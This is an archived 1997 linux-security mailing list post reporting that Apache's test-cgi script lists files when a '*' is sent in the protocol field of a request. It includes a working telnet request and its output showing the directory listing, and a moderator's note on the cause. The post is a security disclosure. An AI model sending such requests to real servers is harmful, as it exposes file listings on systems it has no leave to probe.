[1573] in linux-security and linux-alert archive
[linux-security] Inventory files bug now in SERVER_PROTOCOL
daemon@ATHENA.MIT.EDU (Jason Uhlenkott)
Fri Jun 20 07:44:20 1997
Date: Fri, 06 Jun 1997 00:57:32 -0800
From: Jason Uhlenkott <jasonuhl@usa.net>
To: linux-security@redhat.com
Resent-From: linux-security@redhat.com
Reply-To: linux-security@redhat.com
Sorry if this has already been discovered. I just read about the
test-cgi bug in which all files on the system could be inventoried if a
* was put in the QUERY_STRING. I'm running Apache/1.2b11, which has the
QUERY_STRING problem fixed, but the same problem seems to exist in
SERVER_PROTOCOL.
SERVER_PROTOCOL is normally "HTTP/1.0". But Apache seems to accept
anything there. The following worked on my machine:
-------------------------------
Pentium:~$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test-cgi *
HTTP/1.1 200 OK
Date: Fri, 06 Jun 1997 08:44:18 GMT
Server: Apache/1.2b11
Connection: close
Content-Type: text/plain
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = Apache/1.2b11
SERVER_NAME = Pentium.corecom.net
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = printenv test-cgi
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING =
REMOTE_HOST = localhost
REMOTE_ADDR = 127.0.0.1
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
Connection closed by foreign host.
Pentium:~$
-----------------------------
Notice the "SERVER_PROTOCOL = printenv test-cgi". These are the two
files in my cgi-bin directory. Other directories can be viewed just as
easily (for instance, "GET /cgi-bin/test-cgi /*" will list the root
directory).
I uploaded the test-cgi script from my Apache and reproduced this bug on
a Netscape server. I haven't been able to get Netscape's version of
test-cgi yet.
[mod: This is a bug in the "test-cgi" script. CGI-scripts are very
hard to get right. The apache people just put quotes around the fields
that they could easily change from the remote site. They missed this
one. As always, you probably don't know that "test-cgi" exists, and
you probably don't need it. I recommend that you remove all cgi
scripts that you don't use. -- REW]